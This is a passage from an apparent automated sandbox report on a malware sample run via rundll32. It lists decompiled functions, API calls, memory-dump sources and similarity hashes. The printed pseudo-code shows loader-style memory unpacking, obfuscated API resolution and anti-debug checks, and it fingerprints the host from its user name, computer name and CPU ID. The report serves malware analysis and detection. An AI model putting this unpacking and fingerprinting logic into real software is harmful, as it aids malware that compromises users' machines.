										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x49741cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x049718b4
0x049718c4
0x049718cb
0x049718ce
0x049718e3
0x049718ea
0x049718ef
0x04971900
0x04971903
0x04971909
0x0497190d
0x04971910
0x049719ec
0x04971916
0x04971916
0x0497191a
0x049719b2
0x04971920
0x04971921
0x04971926
0x04971929
0x0497192c
0x0497192c
0x04971933
0x04971936
0x0497193e
0x0497193f
0x04971940
0x04971947
0x0497194b
0x04971951
0x04971955
0x04971957
0x0497195b
0x0497195e
0x04971965
0x04971968
0x0497196d
0x04971970
0x04971986
0x04971972
0x0497197c
0x0497197e
0x04971981
0x04971981
0x0497198d
0x0497198d
0x0497198d
0x04971965
0x04971998
0x0497199b
0x0497199e
0x049719a7
0x049719a7
0x049719af
0x049719be
0x049719d3
0x049719c0
0x049719c9
0x049719ce
0x049719e4
0x049719e4
0x049719f3
0x049719f9

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 04971903
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 049719C9
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 049719E4

Strings

Jun 6 2021, xrefs: 04971936

Memory Dump Source

Source File: 00000006.00000002.481362563.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true

Associated: 00000006.00000002.481343195.0000000004970000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481383401.0000000004973000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481392562.0000000004975000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.481406639.0000000004976000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 6 2021
API String ID: 4010158826-1013970402
Opcode ID: 8e56e2249cf0cb3f8a8f95f7c5ea704637471d6d390bb0f4fbf462d4cc2e1be0
Instruction ID: e4a257a93930ac2b8efa4db539e8098ffbc2289223f46ad2ba4b7d4f43522b6c
Opcode Fuzzy Hash: 8e56e2249cf0cb3f8a8f95f7c5ea704637471d6d390bb0f4fbf462d4cc2e1be0
Instruction Fuzzy Hash: 27413C71E00219AFDB14CF99D881AEEBBBAFF48314F148139D90477349D775AA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049720CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E049720CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E04971C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x049720d7
0x049720dc
0x049720ea
0x049720ef
0x049720ef
0x049720f5
0x049720fa
0x049720fe
0x04972102
0x04972102
0x0497210c
0x04972115

APIs

GetCurrentThread.KERNEL32 ref: 049720D1
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 049720DC
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 049720EF
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 04972102

Memory Dump Source

Source File: 00000006.00000002.481362563.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true

Associated: 00000006.00000002.481343195.0000000004970000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481383401.0000000004973000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481392562.0000000004975000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.481406639.0000000004976000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 6b55850ccecb0cbbb8b2f74befb64805609274f49985d7ebf59b8a97ec793a0c
Instruction ID: e9010a07b98249e4a92759255d83bd9775020242a82a21cb2aa8f82df04a38ed
Opcode Fuzzy Hash: 6b55850ccecb0cbbb8b2f74befb64805609274f49985d7ebf59b8a97ec793a0c
Instruction Fuzzy Hash: D7E092713196213BA6212F295C84E6BAF9CEF913747150235F924D22D0CB589C05D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 049B0860, Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(049F81A8,00000000,00000001), ref: 049B08B6

Part of subcall function 049B3490: ___crtCorExitProcess.LIBCMTD ref: 049B3497
Part of subcall function 049B3490: ExitProcess.KERNEL32 ref: 049B34A3

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID: ExitProcess$AllocateHeap___crt
String ID:
API String ID: 2561786895-0
Opcode ID: 1888999bff8d064fa1a1cf2020098d4b4c3fd1f7842777f3a1ca74169d37a1f3
Instruction ID: fa2163592cb103ba17274bd75f0047e905292887698b36818fa4b77d68404370
Opcode Fuzzy Hash: 1888999bff8d064fa1a1cf2020098d4b4c3fd1f7842777f3a1ca74169d37a1f3
Instruction Fuzzy Hash: 5A112170A04208EFEF14EFA4D9897EA3B74EB40319F104535E9854A281D775BA84DBC2

Uniqueness

Uniqueness Score: -1.00%

Function 049AFDE0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 049AFDE5

Part of subcall function 049AFD50: TlsGetValue.KERNEL32(049E3D3C,00000000), ref: 049AFD63
Part of subcall function 049AFD50: TlsGetValue.KERNEL32(049E3D3C,049E3D38), ref: 049AFD84
Part of subcall function 049AFD50: GetModuleHandleA.KERNEL32(049DC518), ref: 049AFD9A
Part of subcall function 049AFD50: GetProcAddress.KERNEL32(00000000,049DC508), ref: 049AFDB2
Part of subcall function 049AFD50: RtlEncodePointer.NTDLL(?), ref: 049AFDD3

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID: Value$AddressEncodeHandleModulePointerProc__encode_pointer
String ID:
API String ID: 1150849369-0
Opcode ID: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
Instruction ID: c955922756c0338814d7c32706e9d95b1608d79a701886a6c76c3b44edeb0b3f
Opcode Fuzzy Hash: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
Instruction Fuzzy Hash: B6A002A698830D23F54231D67C17B16768C4791A7DF490071EA0D096967983B57440E7

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 049AB8F0, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 049B51CB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 049B51E2
UnhandledExceptionFilter.KERNEL32(049DCAC0), ref: 049B51ED
GetCurrentProcess.KERNEL32(C0000409), ref: 049B520B
TerminateProcess.KERNEL32(00000000), ref: 049B5212

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 66bbd6834a767013b8a3726d311337c6d798004598528360d16619cd70eeec81
Instruction ID: fc53411999647c66cbc7d7f0bce31e25704d7e181553097180e73d5c4f038a4c
Opcode Fuzzy Hash: 66bbd6834a767013b8a3726d311337c6d798004598528360d16619cd70eeec81
Instruction Fuzzy Hash: 352123B8A19704DBD780EF99F540A943FB4FB08398F40953AE90987311E3B96E40CF89

Uniqueness

Uniqueness Score: -1.00%

Function 04971144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04971144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L04972210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x49741d0;
				_push(_t15 + 0x497505e);
				_push(_t15 + 0x4975054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0497220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x49741c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x04971144
0x0497114d
0x04971151
0x04971157
0x0497115c
0x04971161
0x04971164
0x04971167
0x0497116c
0x0497116d
0x04971170
0x0497117b
0x04971182
0x04971186
0x04971188
0x04971189
0x0497118c
0x04971191
0x0497119b
0x0497119d
0x0497119d
0x049711b7
0x049711bb
0x0497120b
0x049711bd
0x049711c6
0x049711dc
0x049711e4
0x049711f6
0x049711fa
0x00000000
0x00000000
0x049711e6
0x049711e9
0x049711ee
0x049711f0
0x049711f0
0x049711d1
0x049711d3
0x049711fc
0x049711fd
0x049711fd
0x049711c6
0x04971213

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,0497156A,0000000A,?,?), ref: 04971151
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04971167
_snwprintf.NTDLL ref: 0497118C
CreateFileMappingW.KERNEL32(000000FF,049741C0,00000004,00000000,?,?), ref: 049711B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0497156A,0000000A,?), ref: 049711C8
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 049711DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0497156A,0000000A,?), ref: 049711F4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0497156A,0000000A), ref: 049711FD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0497156A,0000000A,?), ref: 04971205

Memory Dump Source

Source File: 00000006.00000002.481362563.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true

Associated: 00000006.00000002.481343195.0000000004970000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481383401.0000000004973000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481392562.0000000004975000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.481406639.0000000004976000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: b5533b933b1ff4168c499afdd3864c8b1418b6eb580086ee9f716ab32b5fa79b
Instruction ID: a9dff2cc47252793e0ce71ab37e31a39ee6bf975e760b647c894a209fed32d63
Opcode Fuzzy Hash: b5533b933b1ff4168c499afdd3864c8b1418b6eb580086ee9f716ab32b5fa79b
Instruction Fuzzy Hash: 0221BEB2600108FFDB20AFA8DC85EAE7BADFB48390F114535FA15E7291D634AD00DB61

Uniqueness

Uniqueness Score: -1.00%

Function 049AEE50, Relevance: 9.2, APIs: 6, Instructions: 240COMMON

Download Yara Rule

APIs

getSystemCP.LIBCMTD ref: 049AEE65

Part of subcall function 049AED40: GetOEMCP.KERNEL32(00000000,049E31E0,049C3658,000000FF,?,049AEB06,?), ref: 049AED99
Part of subcall function 049AED40: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 049AEDAC

setSBCS.LIBCMTD ref: 049AEE7A
setSBUpLow.LIBCMTD ref: 049AEFD6

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID: Locale$SystemUpdateUpdate::~_
String ID:
API String ID: 2101441384-0
Opcode ID: 765a98c3b169e9d50de16451dd8c33b98a2ddaa5ebfc7e14e80f8ec57846e7d4
Instruction ID: af4e7b75659aa469580695228f38493477b1e9a50fecc8e2c2faa3f06277e31b
Opcode Fuzzy Hash: 765a98c3b169e9d50de16451dd8c33b98a2ddaa5ebfc7e14e80f8ec57846e7d4
Instruction Fuzzy Hash: 5AB12A74A04119EFDF04CF94C494AADBBB2FF44308F14C9AAE8265B345D335EA64DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04971060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04971060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E04971B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x49741d0 + 0x4975014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x49741d0 + 0x49750e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E0497142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x49741d0 + 0x49750f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x49741d0 + 0x4975104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x49741d0 + 0x4975119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x49741d0 + 0x497512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E04971B9C(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x0497106e
0x04971072
0x04971133
0x04971078
0x04971090
0x0497109f
0x049710a6
0x049710aa
0x049710ad
0x0497112b
0x0497112c
0x049710af
0x049710bc
0x049710c0
0x049710c3
0x00000000
0x049710c5
0x049710d2
0x049710d6
0x049710d9
0x00000000
0x049710db
0x049710e8
0x049710ec
0x049710ef
0x00000000
0x049710f1
0x049710fe
0x04971102
0x04971105
0x00000000
0x04971107
0x0497110d
0x04971113
0x04971118
0x0497111f
0x04971122
0x00000000
0x04971124
0x04971127
0x04971127
0x04971122
0x04971105
0x049710ef
0x049710d9
0x049710c3
0x049710ad
0x04971141

APIs

Part of subcall function 04971B58: HeapAlloc.KERNEL32(00000000,?,04971702,?,00000000,00000000,?,?,?,04971CE6), ref: 04971B64

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,04971480,?,?,?,?,00000002,00000000,?,?), ref: 04971084
GetProcAddress.KERNEL32(00000000,?), ref: 049710A6
GetProcAddress.KERNEL32(00000000,?), ref: 049710BC
GetProcAddress.KERNEL32(00000000,?), ref: 049710D2
GetProcAddress.KERNEL32(00000000,?), ref: 049710E8
GetProcAddress.KERNEL32(00000000,?), ref: 049710FE

Part of subcall function 04971B9C: memset.NTDLL ref: 04971C1B

Memory Dump Source

Source File: 00000006.00000002.481362563.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true

Associated: 00000006.00000002.481343195.0000000004970000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481383401.0000000004973000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481392562.0000000004975000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.481406639.0000000004976000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: af8bc1d3ac9e7e8cd510c739005232066a7946ece3b4db32371569dda80dc7c7
Instruction ID: 35089fe48b000cab20562fa8cf6820a52b3d8efc3ffd995f6504d21cd65c61f7
Opcode Fuzzy Hash: af8bc1d3ac9e7e8cd510c739005232066a7946ece3b4db32371569dda80dc7c7
Instruction Fuzzy Hash: D8211EB160460AEFDB50EF69EC85D5A7BFCFB58698B054435E909CB202E734E9018FA0

Uniqueness

Uniqueness Score: -1.00%

Function 049BCEB0, Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

___initconout.LIBCMTD ref: 049BCED2

Part of subcall function 049C1470: CreateFileA.KERNEL32(049E0900,40000000,00000003,00000000,00000003,00000000,00000000,?,049BCED7,?,?,?,049B7436,?), ref: 049C1487

GetConsoleOutputCP.KERNEL32(00000000,049B7436,00000001,?,00000005,00000000,00000000,?,?,?,049B7436,?), ref: 049BCF55
WideCharToMultiByte.KERNEL32(00000000,?,?,?,049B7436,?), ref: 049BCF5C
WriteConsoleA.KERNEL32(049E41C8,?,049B7436,?,00000000,?,?,?,049B7436,?), ref: 049BCF83

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
String ID:
API String ID: 3432720595-0
Opcode ID: 2d1336d14ba30a710af3cfbe52df59ae2bf5483f8141169bf6013421e58279e1
Instruction ID: 33600b85d8e939704bfda1e0824f52f90279d010183c7e4be647f86323d817cf
Opcode Fuzzy Hash: 2d1336d14ba30a710af3cfbe52df59ae2bf5483f8141169bf6013421e58279e1
Instruction Fuzzy Hash: 3821B730688205EFDB20DFA5EA48BF93B78EB04715F50027DE6429A0C0D7796944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 049E5588, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(049DA680,049E4200,00000718), ref: 049E5709
VirtualProtectEx.KERNEL32(000000FF,?,0000301F,00000040,?), ref: 049E5771

Strings

G, xrefs: 049E5597
T, xrefs: 049E5590
@, xrefs: 049E559D

Memory Dump Source

Source File: 00000006.00000002.481698237.00000000049E4000.00000040.00020000.sdmp, Offset: 049E4000, based on PE: false

Similarity

API ID: EnvironmentProtectVariableVirtual
String ID: @$G$T
API String ID: 3849859166-1505392691
Opcode ID: c4cf5fdac8dfd1d6f8d447b4672bbb217432fbb940fb982f29f574482ed40cc7
Instruction ID: 87e40d46aab09a8346dfa78296d29b239e1665e64f97558af9658fa781b78349
Opcode Fuzzy Hash: c4cf5fdac8dfd1d6f8d447b4672bbb217432fbb940fb982f29f574482ed40cc7
Instruction Fuzzy Hash: CCA15C71908124EFCB24CFAAD850AB9BFB6FB88316F058539E905AB244D7389D44CF54

Uniqueness

Uniqueness Score: -1.00%

Function 049A7630, Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

std::_String_base::_Xlen.LIBCPMTD ref: 049A7643

Part of subcall function 049A8620: std::bad_exception::bad_exception.LIBCMTD ref: 049A8660
Part of subcall function 049A8620: __CxxThrowException@8.LIBCMTD ref: 049A866E

std::_String_base::_Xlen.LIBCPMTD ref: 049A766A
std::_String_base::_Xlen.LIBCPMTD ref: 049A7681
_memcpy_s.LIBCMTD ref: 049A76FA

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID: String_base::_Xlenstd::_$Exception@8Throw_memcpy_sstd::bad_exception::bad_exception
String ID:
API String ID: 649725542-0
Opcode ID: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction ID: 6fac69e25be07c1e6bf553040c22dbd66b6fb0a15533b610ebe9ca2173730ba7
Opcode Fuzzy Hash: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction Fuzzy Hash: 9631C3327007028BD320EE9DC881A6BF7E9DBA0265F144D7EE59287651E771F86487D1

Uniqueness

Uniqueness Score: -1.00%

Function 04971F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04971F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x49741b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x49741bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x49741ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x49741a8 = _t5;
					 *0x49741b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x49741a4 = _t6;
					if(_t6 == 0) {
						 *0x49741a4 =  *0x49741a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x04971f11
0x04971f1f
0x04971f27
0x04971f2c
0x04971f76
0x04971f76
0x04971f2e
0x04971f36
0x04971f72
0x04971f74
0x04971f38
0x04971f38
0x04971f3d
0x04971f4b
0x04971f50
0x04971f56
0x04971f5e
0x04971f63
0x04971f65
0x04971f65
0x04971f6f
0x04971f6f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,04971C8E,74B063F0,00000000), ref: 04971F1F
GetVersion.KERNEL32 ref: 04971F2E
GetCurrentProcessId.KERNEL32 ref: 04971F3D
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04971F56

Memory Dump Source

Source File: 00000006.00000002.481362563.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true

Associated: 00000006.00000002.481343195.0000000004970000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481383401.0000000004973000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481392562.0000000004975000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.481406639.0000000004976000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 39dc181d84a00e0143c7be8ddc6a149aa143fed30f0441dbe3c01b6fe2cdb5db
Instruction ID: de455f0ae11ce170bdb601ec321b9cec204df4931a48e0fe93f5f1a335cb39e3
Opcode Fuzzy Hash: 39dc181d84a00e0143c7be8ddc6a149aa143fed30f0441dbe3c01b6fe2cdb5db
Instruction Fuzzy Hash: 34F0F47168D220AFE760AF68B80AB853FA8F725791F14013AF655C92C1E3B85841DB48

Uniqueness

Uniqueness Score: -1.00%

Function 049B05D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 049B0644
_ValidateRead.LIBCMTD ref: 049B0659

Strings

csm, xrefs: 049B05D9

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID: ReadValidate__encode_pointer
String ID: csm
API String ID: 977738414-1018135373
Opcode ID: bc8446bac4428bdb408e1357ea04936f70f7835a13769d9249f75c881ca9bd5b
Instruction ID: 28a6c695eeb3a1eefdc5434a4e38978e2a4bb29f6ce00ddda31aada7a1df6d25
Opcode Fuzzy Hash: bc8446bac4428bdb408e1357ea04936f70f7835a13769d9249f75c881ca9bd5b
Instruction Fuzzy Hash: 19114975A00208DFCB14CF64E6549AB7BA9AF80305F5042B8E8895F251DB31FE81CBD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6036 Parent PID: 5364 rundll32.exeCOMMON

Executed Functions

Function 02F84F71, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000941,00003000,00000040,00000941,02F849C8), ref: 02F8502E
VirtualAlloc.KERNEL32(00000000,00000056,00003000,00000040,02F84A2A), ref: 02F85065
VirtualAlloc.KERNEL32(00000000,0000C27B,00003000,00000040), ref: 02F850C5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02F850FB
VirtualProtect.KERNEL32(02F10000,00000000,00000004,02F84F50), ref: 02F85200
VirtualProtect.KERNEL32(02F10000,00001000,00000004,02F84F50), ref: 02F85227
VirtualProtect.KERNEL32(00000000,?,00000002,02F84F50), ref: 02F852F4
VirtualProtect.KERNEL32(00000000,?,00000002,02F84F50,?), ref: 02F8534A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02F85366

Memory Dump Source

Source File: 00000007.00000002.480981324.0000000002F84000.00000040.00020000.sdmp, Offset: 02F84000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction ID: 54c88b35d521f57be31c4a04add5ad8a1ba6b9c5e3542fc9cbf3b3406e478eb4
Opcode Fuzzy Hash: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction Fuzzy Hash: 23D1C073500601AFDB14DF16C9C0B62B7B6FF58350B4D6194EE89AFB5AE370A850CB62

Uniqueness

Uniqueness Score: -1.00%

Function 03294454, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E03294454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x329a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E0329143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x329a2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x329a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E0329283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x329a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x329a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E0329283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x329a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x03294454
0x0329445c
0x03294462
0x03294465
0x03294468
0x0329446a
0x0329446f
0x0329446f
0x03294475
0x03294477
0x03294484
0x032944e5
0x03294486
0x0329448b
0x03294491
0x03294496
0x032944a4
0x032944a8
0x032944b7
0x032944be
0x032944c5
0x032944c5
0x032944d0
0x032944d0
0x032944a8
0x03294496
0x032944e7
0x032944ed
0x032944f7
0x032944f9
0x032944fe
0x0329450d
0x03294511
0x0329451c
0x03294523
0x0329452a
0x0329452a
0x03294536
0x03294536
0x03294511
0x0329453f
0x03294541
0x03294544
0x03294546
0x03294549
0x0329454c
0x03294556
0x0329455a
0x0329455e

APIs

GetUserNameW.ADVAPI32(00000000,032955CE), ref: 0329448B
RtlAllocateHeap.NTDLL(00000000,032955CE), ref: 032944A2
GetUserNameW.ADVAPI32(00000000,032955CE), ref: 032944AF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,032955CE,?,?,?,?,?,03296BD8,?,00000001), ref: 032944D0
GetComputerNameW.KERNEL32(00000000,00000000), ref: 032944F7
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0329450B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 03294518
